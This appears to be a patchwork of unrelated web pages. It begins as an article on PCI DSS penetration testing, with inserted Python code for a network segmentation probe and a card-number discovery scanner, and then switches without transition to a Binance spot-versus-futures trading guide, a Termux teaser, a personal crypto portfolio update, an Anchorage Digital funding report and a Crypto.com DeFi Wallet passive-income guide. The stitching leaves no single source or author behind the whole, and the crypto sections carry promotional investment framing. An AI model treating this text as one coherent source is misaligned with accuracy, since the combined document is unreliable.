| Test Type | What Is Tested | Why It Matters |
|---|---|---|
| Network penetration testing | External and internal network defenses | Identifies perimeter and lateral movement risks |
| Application penetration testing | Payment applications and APIs | Detects logic flaws, injection, and data exposure |
| Segmentation testing | Isolation between CDE and non-CDE systems | Confirms the reduced PCI scope and attack surface |
| Authentication testing | Access controls and privilege escalation | Prevents unauthorized access to card data |
Penetration Testing vs Vulnerability Scanning (PCI Context)

| Area | Vulnerability Scanning | Penetration Testing |
|---|---|---|
| Nature | Automated detection | Human-led exploitation |
| Depth | Identifies weaknesses | Proves real-world impact |
| Frequency | Quarterly (minimum) | Annual + after significant changes |
| PCI Requirement | Req. 11.3 in v4.0 (11.2 in v3.2.1) | Req. 11.4 in v4.0 (11.3 in v3.2.1) |
| Outcome | Risk indicators | Confirmed security gaps |
Analogy: PCI DSS and Penetration Testing
Think of PCI DSS as the locks and safeguards a company places on its cardholder data. A penetration test is the guided, overseen, deliberate attempt to break those locks: it gauges vulnerabilities, identifies flaws, and reports the gaps so the security posture can be improved. PCI DSS penetration testing validates real-world security controls by testing the PCI DSS safeguards against realistic attack scenarios.
Evidence PCI Auditors Expect from Penetration Testing

| Evidence Item | What It Demonstrates |
|---|---|
| Scope definition | All relevant CDE systems were tested |
| Methodology | Industry-recognized testing approach used |
| Findings report | Identified vulnerabilities and exploit paths |
| Remediation evidence | Issues were fixed and verified |
| Retest results | Fixes are effective and durable |
Why Declared Compliance Is Not Enough
Even if a company says they follow PCI DSS, there may very well be holes, misconfigurations, or ways attackers could sneak in.
Common PCI DSS Penetration Testing Failures

| Failure | Why It Causes Audit Issues |
|---|---|
| Testing only externally | Internal threats are ignored |
| Excluding cloud components | Modern CDEs are hybrid |
| No segmentation testing | PCI scope cannot be trusted |
| No retesting after fixes | Control effectiveness is unproven |
| Generic reports | Lack of PCI-specific relevance |
Why PCI DSS 4 Leans So Heavily on Testing
Under older models, compliance was point-in-time and evidence-heavy. An added downside was that compliance was slow to adapt to real risk.
Who Is Responsible for PCI DSS Penetration Testing

| Role | Responsibility | Why It Matters |
|---|---|---|
| Executive management | Approves scope, budget, and remediation timelines | PCI DSS places accountability at the governance level, not just IT |
| Compliance / GRC team | Aligns testing with PCI DSS requirements and audit expectations | Ensures testing is evidence-ready, not just technically sound |
| Security team | Coordinates test execution and validates findings | Bridges technical results with business risk |
| External penetration testing provider | Conducts independent, qualified testing | Independence is required to ensure credibility and objectivity |
| System owners | Fix vulnerabilities and support retesting | Controls are only effective if remediation is verified |
Penetration Testing and the Shift Toward Effectiveness
Penetration testing is thus well suited to this shift in emphasis, because it forces differing implementations to converge toward real security. It exposes implementations where PCI DSS controls look right on paper but fall short in behavior, and it validates whether your environment technically resists attack.
How PCI DSS 4.0 Changes Expectations for Penetration Testing
| Area | Pre–PCI DSS 4.0 Approach | PCI DSS 4.0 Expectation |
| --- | --- | --- |
| Testing mindset | Point-in-time compliance | Continuous validation of control effectiveness |
| Change-driven testing | Often informal or delayed | Explicitly required after significant changes |
| Cloud environments | Frequently under-scoped | Fully in-scope if they impact the CDE |
| Segmentation validation | Sometimes assumed | Must be actively proven through testing |
| Evidence quality | High-level reports accepted | Clear exploit paths, impact, and verification required |
| Retesting | Sometimes skipped | Mandatory to confirm fixes are effective |
Objectives and Benefits of PCI Penetration Testing and Vulnerability Analysis
The outcome of penetration testing should demonstrate that cardholder data is protected to the standard PCI DSS requires. Vulnerability analysis aims to locate weaknesses and exploitable gaps that could lead to a loss of confidentiality of cardholder data.
Penetration testing and vulnerability analysis aren’t merely about ticking a compliance box; there are real practical benefits to doing them properly. First, they protect the cardholder data environment (CDE). A solid penetration test verifies that access controls to card data actually enforce need-to-know, not merely on paper, and a well-run testing campaign is how you prove that your systems, controls and processes protect cardholder data.
Another objective is to test network segmentation. Validating segmentation through penetration testing demonstrates that the controls limiting access to the networks where cardholder data is stored, processed, or transmitted actually hold, which also limits the reach of an insider or of a compromised out-of-scope host. You are proving that even if someone has access to part of the network, they cannot move laterally into systems that store, process, or transmit cardholder data; any flow that does succeed from an out-of-scope segment means the source was wrongly excluded from PCI scope.
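A minimal form of that segmentation check, written here as an added example (not part of the original article or of any vendor's tooling): run from a host in the out-of-scope segment, it attempts TCP connections to the documented CDE hosts and ports and reports every flow that succeeded but is absent from the approved allow-list. The hosts, ports and allow-list are placeholders for what the scope document actually permits; the local-listener helper exists only so the probe can be exercised offline.

```python
"""Segmentation check run from an out-of-scope segment against CDE hosts.

Added example, not the article's or any vendor's tooling. Target hosts, ports and the
allow-list are placeholders for what the scope document actually says.
"""
import socket
from dataclasses import dataclass
from typing import Iterable, List, Set, Tuple

Flow = Tuple[str, int]  # (destination host, TCP port)


@dataclass(frozen=True)
class ProbeResult:
    host: str
    port: int
    reachable: bool


def probe_tcp(host: str, port: int, timeout: float = 1.0) -> ProbeResult:
    """A completed TCP handshake means the segmentation control allowed this flow.

    A refused or timed-out connection is treated the same way: the flow was blocked.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return ProbeResult(host, port, True)
    except OSError:
        return ProbeResult(host, port, False)


def segmentation_failures(results: Iterable[ProbeResult], allowed: Set[Flow]) -> List[ProbeResult]:
    """Flows that succeeded but are not in the documented allow-list.

    Each one is evidence that the 'out-of-scope' source can reach the CDE, so either the
    control is misconfigured or the source segment belongs in scope.
    """
    return [r for r in results if r.reachable and (r.host, r.port) not in allowed]


def run_segmentation_test(cde_hosts: Iterable[str], ports: Iterable[int],
                          allowed: Set[Flow]) -> List[ProbeResult]:
    """Probe every host/port pair and keep only the unexpected successes."""
    results = [probe_tcp(h, p) for h in cde_hosts for p in ports]
    return segmentation_failures(results, allowed)


def open_local_listener() -> socket.socket:
    """Helper so the probe can be exercised offline: a throwaway listener on 127.0.0.1."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s


if __name__ == "__main__":
    # Placeholder CDE inventory and the one flow the scope document permits (hypothetical).
    cde_hosts = ["10.10.20.11", "10.10.20.12"]
    ports = [22, 443, 1433, 3389]
    allowed = {("10.10.20.11", 443)}
    for r in run_segmentation_test(cde_hosts, ports, allowed):
        print(f"FAIL: {r.host}:{r.port} reachable from out-of-scope segment")
```

The probe is deliberately a plain TCP connect rather than a port scanner: what the auditor wants is evidence of which documented flows were attempted, from where, and which of them were unexpectedly allowed, and a list of ProbeResult records is exactly that evidence. Repeat it from every out-of-scope segment the scope document claims is isolated.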
Penetration testing also helps you identify common but high-impact web application vulnerabilities—things like SQL injection, broken authentication, and session management issues. These are exactly the kinds of weaknesses attackers look for, and PCI explicitly expects you to test them.
Being able to demonstrate that you regularly test your environment shows customers, partners, and your supply chain that you take data security seriously. That matters increasingly, especially when third-party risk is under scrutiny.
From a compliance standpoint, regular testing helps you maintain PCI DSS compliance over time, not just during audit season. It supports a more proactive security posture instead of reacting to findings once a year.
And finally, penetration testing is one of the most effective ways to uncover insecure configurations—across systems, networks, and applications—that might otherwise go unnoticed. These are often the exact issues that lead to audit findings or real-world breaches.
So overall, PCI testing isn’t just about passing an audit. It’s about proving that your controls actually work, in real conditions.
Insights from VISTA InfoSec – Cardholder Data Discovery Is About Preventing Silent Data Drift
At VISTA InfoSec, we were called in by a major enterprise that had suffered a data breach even though it was certified against PCI DSS. After investigation, our consultants found that the breached card data resided on systems that were not in scope. This happened because cardholder data discovery had been limited to systems already assumed to be in scope. We have seen this issue across multiple clients over the past 15 years: they had overlooked data drift, where card data spreads into non-card environments via logs, backups, integrations, or analytics workflows.
In one representative case, transaction payloads containing partial PAN data were logged by an application middleware layer and forwarded to a centralized logging and analytics platform classified as out of scope. Over time, those logs were backed up to shared storage and replicated across regions, creating multiple unintended copies of card data outside the defined CDE.
Cardholder data discovery isn’t just about scanning systems you already believe are in scope. It’s about making sure card data hasn’t quietly drifted somewhere it shouldn’t be. That’s why CHD scans need to cover both card and non-card environments. They help confirm that sensitive data hasn’t been duplicated, stored unencrypted, or left behind in unexpected places—and they’re critical for validating where card data really exists when you’re making ROC assertions.
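The drift described above (PANs leaking through a middleware log into an "out-of-scope" analytics and backup pipeline) is exactly what a cardholder data discovery scan has to catch on systems nobody believed were in scope. The following is an added example, not VISTA InfoSec's tooling: it pulls candidate digit runs out of log lines, drops anything that fails the Luhn checksum or does not match a card brand's IIN and length, and reports only a first-6/last-4 mask so the report itself is not cardholder data. The log lines are constructed and use public test card numbers, not real PANs.

```python
"""Cardholder-data discovery over log lines: candidate digit runs, Luhn check, brand check.

Added example, not VISTA InfoSec tooling. The log lines below are constructed and use
public test card numbers (4111..., 5555..., 3782...), not real PANs.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# 13-19 digits, optionally separated by single spaces or hyphens, not adjacent to other digits.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


@dataclass(frozen=True)
class Finding:
    lineno: int
    brand: str
    masked_pan: str  # first 6 and last 4 only, so the report itself is not CHD


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 checksum, as used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch)
        if i % 2 == 1:
            n *= 2
            if n > 9:
                n -= 9
        total += n
    return total % 10 == 0


def brand_of(digits: str) -> Optional[str]:
    """Coarse IIN/length rules for the major brands; enough to discard order IDs and timestamps."""
    n = len(digits)
    if digits[0] == "4" and n in (13, 16, 19):
        return "visa"
    if n == 16 and (51 <= int(digits[:2]) <= 55 or 2221 <= int(digits[:4]) <= 2720):
        return "mastercard"
    if n == 15 and digits[:2] in ("34", "37"):
        return "amex"
    if n == 16 and digits.startswith("6011"):
        return "discover"
    return None


def mask_pan(digits: str) -> str:
    """Keep first 6 and last 4 digits, the long-accepted truncation for reports."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def scan_lines(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per full PAN found; already truncated or masked PANs do not match."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for m in CANDIDATE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group(0))
            if not luhn_ok(digits):
                continue
            brand = brand_of(digits)
            if brand is None:
                continue
            findings.append(Finding(lineno, brand, mask_pan(digits)))
    return findings


# Constructed sample: an "out-of-scope" analytics/backup pipeline that received middleware logs.
SAMPLE_LOG = [
    "2024-03-02T10:14:05Z middleware INFO order=88213 pan=4111111111111111 amt=19.99",
    "2024-03-02T10:14:06Z middleware INFO order=88214 pan=411111******1111 amt=5.00",
    '2024-03-02T10:14:07Z analytics DEBUG payload={"card":"5555 5555 5555 4444","exp":"12/27"}',
    "2024-03-02T10:14:08Z analytics DEBUG trace_id=1234567890123456 status=ok",
    "2024-03-02T10:14:09Z backup INFO copied row card=3782-822463-10005 region=eu-west-2",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f.lineno}: {f.brand} {f.masked_pan}")
```

Two design points matter for a real run. The Luhn and brand filters are what keep the scan usable: line 4's trace_id is sixteen digits but fails the checksum, so it is not reported, while the already masked PAN on line 2 never becomes a candidate. And the scan has to be pointed at everything the drift can reach (log indices, backups, replicated storage, analytics exports), not only at the systems already in the scope document, because those are the copies the ROC assertion is silently wrong about.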
Conclusion
PCI DSS formally requires penetration testing: Requirement 11.3 in v3.2.1, Requirement 11.4 in v4.x. Many companies hire an external provider, and many are unaware that the testing can also be performed by a qualified internal resource, provided the tester is organizationally independent of the systems under test. (An ASV performs the quarterly external vulnerability scans, which are a separate requirement, and a QSA assesses the environment rather than testing it.) Penetration testing must be performed at least once every 12 months and after any significant change to the infrastructure or applications; service providers must additionally confirm their segmentation controls at least every six months.
Companies are advised to work ahead of time with their QSA on test scope and methodology to increase the likelihood of meeting compliance. Penetration testing for PCI DSS helps maintain security posture, identify vulnerabilities, and ensure robust practices for protecting cardholder data.
Need Expertise for Implementing PCI DSS 4.0.1?
At VISTA InfoSec, we don’t just help you prepare for an audit; we help you build security that stands up to real-world attacks. As attacks on payment environments become more automated and complex, organizations need more than checklists and templates. Whether your organization needs a PCI compliance security assessment to evaluate its posture, an independent assessor to avoid a conflict of interest with your QSA, or penetration testing of the cardholder data environment, we understand what organizations require:
They need experienced guidance, tested controls, and continuous assurance.
Our certified experts work alongside your teams to clearly define scope, close compliance gaps, validate controls, and ensure you are audit-ready across people, processes, and technology.
Continuous PCI Compliance testing
PCI DSS cloud penetration testing
The result is not just PCI DSS 4.0.1 compliance, but a stronger, resilient cardholder data environment you can trust. Achieving continuous PCI compliance requires more than the right VAPT teams and collaboration; it needs vision and coherent approaches for your security posture and systems.
Want to learn more? Check out VISTA InfoSec’s YouTube Channel for simple explanations and expert guidance.
Spot vs Futures on Binance - Where Should Smart Money Actually Trade?
Smart money doesn’t chase hype — it chooses structure, liquidity, and asymmetric risk. On Binance, that choice usually comes down to one critical decision: Spot trading or Futures trading?
Retail traders often frame this debate as simple — low risk vs high reward. Professionals know it’s far more nuanced. The real question isn’t which market is more profitable, but which market aligns with capital preservation, risk-adjusted returns, and scalable strategy execution.
In this in‑depth guide, we break down Spot vs Futures on Binance from the perspective of institutional traders, hedge funds, high‑net‑worth investors, and disciplined professionals — not gamblers.
By the end, you’ll know exactly where smart money actually trades, why, and how to position yourself accordingly.
Smart money uses both Spot and Futures on Binance — but for different objectives.
Spot trading is preferred for long‑term accumulation, capital preservation, and directional conviction.
Futures trading is used for hedging, short‑term alpha, volatility capture, and capital efficiency — not reckless leverage.
The edge comes from knowing when to use each market, not choosing only one.
Understanding Binance Spot Trading
What Is Spot Trading on Binance?
Spot trading on Binance involves buying or selling cryptocurrencies at the current market price, with immediate ownership of the underlying asset. When you buy BTC on the spot market, you actually own BTC — no contracts, no expiry, no liquidation risk.
This is the most straightforward and transparent form of crypto trading, which is why it remains the foundation of most professional portfolios.
Key Features of Binance Spot Markets
Real ownership of assets
No leverage required
No liquidation risk
Simple fee structure
Ideal for long‑term holding
Who Uses Spot Trading?
Spot markets attract:
Long‑term investors
Funds building core crypto exposure
Family offices allocating to digital assets
Traders with strong directional conviction
Risk‑averse capital seeking asymmetric upside
For smart money, spot trading is about positioning, not excitement.
Advantages of Spot Trading (Why Smart Money Loves It)
1. No Liquidation Risk
One of the biggest advantages of spot trading is zero liquidation risk. Prices can move violently against you, but your position remains intact unless you choose to exit.
This is critical for professionals who prioritize survivability over short‑term performance.
2. Ideal for Long‑Term Conviction Trades
Smart money often identifies structural trends early — Layer 2 adoption, Bitcoin halvings, ETF inflows, DeFi primitives, or real‑world asset tokenization.
Spot markets allow them to:
Accumulate gradually
Ride multi‑year trends
Ignore short‑term volatility
3. Simpler Risk Management
Risk is limited to the capital invested. There are no margin calls, funding rates, or forced liquidations to manage.
This simplicity is a feature, not a weakness.
4. Psychological Advantage
Spot traders experience far less emotional pressure than leveraged traders.
This leads to:
Better decision‑making
Less over‑trading
More consistent execution
Smart money values emotional control as much as strategy.
Limitations of Spot Trading
Despite its strengths, spot trading isn’t perfect.
Capital Inefficiency
To generate meaningful returns, spot traders must deploy significant capital. A 20% move requires 100% capital exposure.
For institutions seeking capital efficiency, this can be a constraint.
Limited Short Opportunities
Spot markets make shorting difficult or impossible without borrowing assets, which adds complexity and counterparty risk.
This is where futures enter the conversation.
Pro Insight: Most traders lose money not because of bad markets — but because they choose the wrong tool.
Understanding Binance Futures Trading
What Are Binance Futures?
Binance Futures allows traders to speculate on the price of cryptocurrencies using derivative contracts rather than owning the underlying asset.
Key characteristics include:
Ability to go long or short
Use of leverage
Funding rates
Liquidation thresholds
Types of Binance Futures
USDT‑Margined Futures (most popular)
COIN‑Margined Futures
Smart money overwhelmingly prefers USDT‑margined perpetual futures due to liquidity and simplicity.
Why Smart Money Uses Futures (The Real Reasons)
Contrary to popular belief, professionals do not use futures primarily to gamble with high leverage.
1. Hedging Spot Exposure
One of the most common professional strategies is spot‑futures hedging.
Example:
Long BTC in spot
Short BTC perpetual futures during high volatility
This allows smart money to:
Protect downside risk
Lock in profits
Reduce portfolio volatility
2. Capital Efficiency
Futures require far less capital than spot positions. This allows funds to:
Deploy capital across multiple strategies
Maintain liquidity
Optimize returns on equity
3. Short‑Term Alpha Generation
Futures markets are ideal for:
Range trading
Breakout strategies
Mean reversion
Event‑driven trades
These strategies are difficult to execute efficiently on spot markets.
4. Market Neutral Strategies
Smart money often aims for delta‑neutral returns — profits regardless of market direction.
This is impractical without derivatives such as futures.
Risks of Futures Trading (Why Retail Traders Lose)
Liquidation Risk
Leverage magnifies both gains and losses. Poor risk management leads to forced liquidation — the #1 reason retail traders fail.
Funding Rate Costs
Holding futures positions during crowded trades can result in significant funding payments, silently eroding profits.
Emotional Overload
Leverage amplifies stress, leading to:
Over‑trading
Revenge trading
Strategy abandonment
Smart money survives by avoiding these traps.
Spot vs Futures: Side‑by‑Side Comparison
Where Does Smart Money Actually Trade?
The honest answer: both — but strategically.
Smart Money Playbook
Spot for core holdings and conviction trades
Futures for risk management, tactical positioning, and volatility capture
They do not:
Go all‑in on high leverage
Trade emotionally
Chase every move
They focus on risk‑adjusted returns, not screenshots.
Common Retail Mistakes to Avoid
Using high leverage without a plan
Trading futures without understanding funding rates
Ignoring spot accumulation
Over‑trading low‑quality setups
Confusing luck with skill
Avoiding these mistakes immediately puts you ahead of 90% of traders.
How to Choose Between Spot and Futures
Ask yourself:
Is my goal long‑term wealth or short‑term income?
Can I emotionally handle leverage?
Do I understand liquidation mechanics?
Am I trading with a strategy or chasing price?
If unsure, start with spot.
Advanced Strategy: Combining Spot and Futures
Professionals often run hybrid strategies, such as:
Spot accumulation + futures hedging
Spot long‑term + futures scalping
Spot portfolio + futures arbitrage
This layered approach reduces risk while maximizing opportunity.
Final Verdict: Spot vs Futures on Binance
Spot trading builds wealth. Futures trading manages and enhances it.
Smart money doesn’t choose sides — it chooses structure, discipline, and survivability.
If your goal is long‑term success rather than short‑term excitement, the path is clear:
Build conviction in spot markets
Use futures selectively
Manage risk relentlessly
That’s where smart money actually trades.
This isn’t content for gamblers.
It’s for traders who want to stay in the game long enough to win.
Termux is an incredibly powerful terminal emulator for Android. I previously showed you how to use it to download any media file, convert files, or ssh into another device. However, that barely scratched the surface. Here are even more awesome things you can do with a terminal window on your phone.
Mixed bag this week in crypto markets: BTC held roughly within the ~$91k to ~$95.6k range overall, while altcoins like SUI (+20–31%) and XRP surged. Your portfolio (BTC, ETH, SUI, AERO, XRP) stayed positive on average, buoyed by SUI/XRP strength amid BTC stability around 95–97k. 📈
📊 Weekly Coin Movements
Portfolio benefited from altcoin rotation away from BTC dominance.
| Coin | Weekly Change / Volatility | Key Swings | Note |
| --- | --- | --- | --- |
| BTC | -0.58% to +5% | 91k → 97k USD | Stable, mild dip |
| ETH | -2% to +3% | 3,200–3,500 USD | Consolidation |
| SUI | +20–31% | 1.5 → 1.8–2 USD | Top winner 🚀 |
| AERO | Neutral | No big moves | Following alt trend |
| XRP | +21% | → 2.1 USD | BTC rotation play |
🔍 BTC Technical Analysis (Weekly)
Moderate bullish momentum emerging.
RSI: 58 (neutral, not overbought).
MACD: Mild positive histogram (upside potential).
ADX: 28 (moderate trend strength).
Trend: Upward above 90k support, rising volatility via Bollinger Bands.
| Category | Last Week | Now | Change |
| --- | --- | --- | --- |
| Total Value | ~$8,700 | $8,927 | +$227 (+2.6%) |
| Est. Daily Yield | ~$3.7–4.0 | ~$3.8 | Stable |
| Accrued Yield (Lifetime) | ~$1,691 | $1,738 | +$47 net |
Notes: Growth from yields + mild BTC/ETH price lifts. Lower volatility, better range-resilience. Risk down, IL pressure eased. Subjective score: 8.2/10 (up from 7.5).
🧾 Quick Conclusion
Portfolio up ~2.6% in a week, holding steady daily cashflow (~$3.8). APY isn’t sky-high, but structure is mature, less volatile, and sustainable — less action, more results.
🧠 Final Take:
❌ No strategy issues.
❌ Beefy autocompound flawless.
✅ Time + volume will scale it.
👉 HODL portfolio: Real fees, controlled risk, gradual growth — no bridging frenzy.
Thoughts on SUI ETF buzz or XRP’s win? Comment below! 👇
⚠️ Disclaimer
This post is just my personal opinion and ideas. I am not promoting or recommending any cryptocurrency or investment. Please do your own research and be careful when investing. Any decisions you make are at your own risk.
Canaan Inc. is at risk of a Nasdaq delisting as it has fallen below the exchange’s minimum bid price threshold for the second time over the past 12 months. Shares for the Bitcoin mining hardware maker were down over 63%…
Anchorage Digital, a New York–based crypto bank, is moving to raise fresh capital as it prepares to enter public markets. According to Bloomberg, people familiar with the matter say the firm is looking to secure between $200 million and $400 million in new funding.
Anchorage Seeks Major Funding
Reports say the Firm is exploring a $200M–$400 million round to strengthen its business before a possible public listing. The plan would put Anchorage among a small group of crypto-native companies that have tried to list on stock markets after building regulated services for institutions.
The company’s bank affiliate holds a federal charter, a status that gives it a different footing compared with many crypto firms. That federal backing is often cited by investors as a reason Anchorage can offer custody and other services seen as safer by big clients.
Based on reports, Anchorage last raised capital in a previous round that valued the business at over $3 billion, and the fresh funding is viewed as a runway toward a public debut.
Anchorage Digital, whose affiliate is the first federally chartered US digital-asset bank, is seeking to raise fresh capital as it explores a potential public listing, according to people with knowledge of the matter https://t.co/6xLNEJN54W
Some reports say the bank is also growing teams tied to stablecoin work and exploring partnerships that would widen its product set for large customers. These moves appear aimed at making the company more attractive to public investors.
Market observers note that crypto firms have been considering public listings more often as regulation clears up in certain areas and as institutional demand for custody and regulated rails grows.
Anchorage’s timing comes while other custody and asset firms weigh similar steps, a trend that could reshape how big investors access crypto services. The atmosphere is cautious, but there is clear interest in regulated players.
Market Reaction And IPO Timing
According to market chatter, the bank could seek a listing as soon as next year, although some coverage says 2027 is also possible. Sources quoted by Bloomberg gave a range of potential timing, and Anchorage has not provided a public comment on the plans.
If Anchorage completes a successful raise and goes public, the event would signal confidence in firms that combine crypto services with bank-style oversight.
Investors will be watching how the company uses the proceeds — whether to build new products, hire staff, or boost its balance sheet ahead of scrutiny that comes with public ownership. The next few months are likely to reveal more details as underwriting and investor talks advance.
Featured image from Yellow, chart from TradingView
How to Use Crypto.com’s DeFi Wallet for Passive Income
What if your crypto could work for you — 24/7 — without relying on banks, brokers, or savings accounts that barely beat inflation?
In a world where traditional interest rates struggle to keep up with rising living costs, decentralized finance (DeFi) has emerged as a powerful alternative for investors seeking passive income, portfolio diversification, and long-term wealth building.
One of the most beginner-friendly yet powerful gateways into this ecosystem is Crypto.com’s DeFi Wallet.
Unlike centralized platforms that control your funds, Crypto.com DeFi Wallet gives you full ownership of your assets, while still offering access to staking, yield farming, liquidity pools, and on-chain rewards — all from a single mobile interface.
In this step-by-step guide, you’ll learn exactly how to use Crypto.com’s DeFi Wallet to generate passive income, even if you’re new to DeFi. We’ll cover setup, security, earning strategies, risk management, and how to maximize yields responsibly.
Whether your goal is earning yield on idle crypto, reducing reliance on traditional debt-based systems, or building decentralized income streams, this guide is designed to help you do it safely and strategically.
What Is Crypto.com’s DeFi Wallet?
Crypto.com’s DeFi Wallet is a non-custodial cryptocurrency wallet that allows users to earn passive income through staking, DeFi lending, liquidity pools, and yield protocols while maintaining full control of their private keys.
Key Features of Crypto.com’s DeFi Wallet
Self-custody (you own your keys, not Crypto.com)
Supports Ethereum, Cronos, Polygon, BNB Chain, Cosmos, and more
Access to staking, DeFi apps (dApps), and yield protocols
Seamless connection to the Crypto.com App
Built-in Web3 browser for DeFi access
Unlike centralized platforms, the wallet connects directly to decentralized finance applications (dApps), enabling on-chain rewards without intermediaries.
Can You Earn Passive Income With Crypto.com’s DeFi Wallet?
Yes, Crypto.com’s DeFi Wallet allows users to earn passive income by staking CRO, earning yield on stablecoins, providing liquidity to DeFi pools, and lending crypto assets through decentralized protocols — all while retaining self-custody.
Returns vary based on market conditions and protocol risk.
Why Use a DeFi Wallet for Passive Income?
Traditional savings accounts often offer negative real returns after inflation. DeFi flips this model by allowing users to earn yield directly from blockchain activity.
Benefits of DeFi Passive Income:
Higher yield potential than banks
No minimum balances
Permissionless access
Global, borderless income streams
Transparency via smart contracts
Crypto.com’s DeFi Wallet acts as a bridge between beginners and advanced DeFi strategies, making it ideal for investors who want passive income without unnecessary complexity.
Step 1: Download and Set Up Crypto.com’s DeFi Wallet
1. Download the Wallet
Available on iOS and Android
Search for “Crypto.com DeFi Wallet”
Ensure the developer is Crypto.com
2. Create a New Wallet
Select “Create New Wallet”
You’ll receive a 12-word recovery phrase
Write it down offline (never store digitally)
Important Security Note: Your recovery phrase is your money. Lose it, and your funds are gone forever.
3. Enable Security Settings
Set a strong passcode
Enable biometric authentication
Turn on transaction confirmations
Step 2: Fund Your DeFi Wallet
To earn passive income, you need assets inside your wallet.
Funding Options:
Transfer crypto from Crypto.com App
Send crypto from another wallet
Bridge assets from other chains
Popular assets for passive income:
CRO
ETH
USDC
ATOM
MATIC
Each asset offers different yield opportunities, risk levels, and lock-up terms.
Step 3: Understand the Passive Income Options Inside the DeFi Wallet
Crypto.com’s DeFi Wallet supports multiple income-generating strategies, each with different risk-reward profiles.
What Are the Best Passive Income Strategies in Crypto.com’s DeFi Wallet?
The most popular passive income methods include:
CRO staking
Stablecoin yield farming
Liquidity pool participation
DeFi lending protocols
Each strategy offers different risk levels, yield potential, and liquidity conditions.
Strategy 1: CRO Staking (Beginner-Friendly)
How CRO Staking Works
By staking CRO, you help secure the Cronos network and earn staking rewards in return.
Why CRO Staking Is Popular:
Predictable yields
No active management
On-chain transparency
Ideal for long-term holders
Step-by-Step CRO Staking:
Open DeFi Wallet
Select Earn
Choose CRO Staking
Select a validator
Stake your CRO
Typical APYs fluctuate based on network conditions, but CRO staking remains one of the most stable DeFi income options.
Strategy 2: Stablecoin Yield (Low Volatility)
If you prefer income without price swings, stablecoins are your friend.
Common Stablecoin Options:
USDC
USDT
DAI
Where Stablecoin Yield Comes From:
Lending protocols
Liquidity pools
Automated market makers (AMMs)
Benefits:
Reduced volatility
Predictable yield
Ideal for capital preservation
This approach is especially attractive for investors focused on debt reduction, cash-flow stability, or income replacement strategies.
Is Stablecoin Yield Safer Than Crypto Staking?
Stablecoin yield strategies are generally less volatile than crypto staking because the assets are pegged to fiat currencies like the U.S. dollar. However, they still carry smart contract and protocol risk, and the peg itself can fail: a stablecoin that loses its peg turns a "low volatility" position into a loss.
Stablecoins are often used for income stability and capital preservation.
Strategy 3: Liquidity Pool Participation (Advanced)
This strategy is best for experienced investors who understand DeFi mechanics and risk management.
What Is Impermanent Loss in DeFi?
Impermanent loss occurs when the price of tokens in a liquidity pool changes compared to holding them individually, potentially reducing overall returns despite earning trading fees.
It is a key risk factor when providing liquidity in DeFi protocols.
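The definition above can be made concrete for the simplest pool type. As an added example (not from the original guide), the code below computes impermanent loss for a 50/50 constant-product pool (x·y = k) from the price ratio alone, and cross-checks that closed-form result against an explicit simulation of the pool rebalancing. The token amounts and prices are illustrative.

```python
"""Impermanent loss for a 50/50 constant-product (x*y=k) pool.

Added example, not from the original guide. Token amounts and prices are illustrative.
"""
import math
from typing import Tuple


def impermanent_loss(price_ratio: float) -> float:
    """LP position value relative to holding the same tokens, minus 1.

    price_ratio r = new price / deposit price of the volatile token. For x*y=k with equal
    value on both sides, LP value / HODL value = 2*sqrt(r) / (1+r), so the result is <= 0
    and equals 0 only when r == 1 (the loss is 'impermanent' only if the price comes back).
    """
    r = price_ratio
    return 2 * math.sqrt(r) / (1 + r) - 1


def position_values(x0: float, y0: float, price_ratio: float) -> Tuple[float, float]:
    """(hodl_value, lp_value) in units of token Y after the price of X moves by price_ratio.

    Deposit of x0 X and y0 Y at price p0 = y0/x0 (balanced pool); arbitrage rebalances the
    pool so that x1*y1 == x0*y0 and y1/x1 == the new price.
    """
    p0 = y0 / x0
    p1 = p0 * price_ratio
    k = x0 * y0
    x1 = math.sqrt(k / p1)
    y1 = math.sqrt(k * p1)
    hodl = x0 * p1 + y0
    lp = x1 * p1 + y1
    return hodl, lp


def fee_yield_to_break_even(price_ratio: float) -> float:
    """Fee income (as a fraction of HODL value) needed so the LP position matches HODL."""
    return -impermanent_loss(price_ratio)


if __name__ == "__main__":
    # 1 ETH plus 2000 USDC deposited at 2000 USDC/ETH (illustrative numbers).
    for r in (0.5, 1.0, 1.25, 2.0, 4.0):
        hodl, lp = position_values(1.0, 2000.0, r)
        print(f"r={r:<5} IL={impermanent_loss(r):+.2%}  hodl={hodl:,.0f}  lp={lp:,.0f}")
```

Two things the numbers show that the definition alone does not: the loss is symmetric in the direction of the move (a halving and a doubling cost the same 5.7%), and a 4x move costs 20% of what simply holding would have been worth, which is the fee yield the pool has to earn over the same period just to break even.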
Strategy 4: DeFi Lending Protocols
Some DeFi platforms allow you to lend your crypto to borrowers and earn interest.
How Lending Generates Income:
Borrowers pay interest
Smart contracts automate repayments
Collateral protects lenders
Ideal Assets:
Stablecoins
Blue-chip cryptocurrencies
This method closely resembles traditional interest-based finance, but without banks acting as middlemen.
Step 4: Using the Built-In Web3 Browser
Crypto.com’s DeFi Wallet includes a Web3 browser, giving access to vetted DeFi protocols.
How to Use It:
Open DeFi Wallet
Tap Browser
Select a DeFi app
Connect your wallet
Review terms before depositing
Always:
Verify URLs
Avoid unknown dApps
Start with small amounts
Is Crypto.com’s DeFi Wallet Safe?
Crypto.com’s DeFi Wallet is considered secure because it is non-custodial, open-source, and requires users to manage their own private keys.
Security ultimately depends on user practices, such as protecting recovery phrases and avoiding unverified DeFi apps.
Step 5: Managing Risk Like a Professional
Passive income doesn’t mean risk-free income.
Smart Risk Management Tips:
Diversify across strategies
Avoid chasing unsustainable APYs
Use stablecoins for balance
Monitor protocol updates
Never invest money you can’t afford to lock up
Think of DeFi as a portfolio tool, not a lottery ticket.
Step 6: Tracking and Reinvesting Your Earnings
Best Practices:
Track yields monthly
Reinvest rewards strategically
Convert profits to stablecoins
Periodically rebalance
Compound interest remains one of the most powerful wealth-building forces — especially in DeFi.
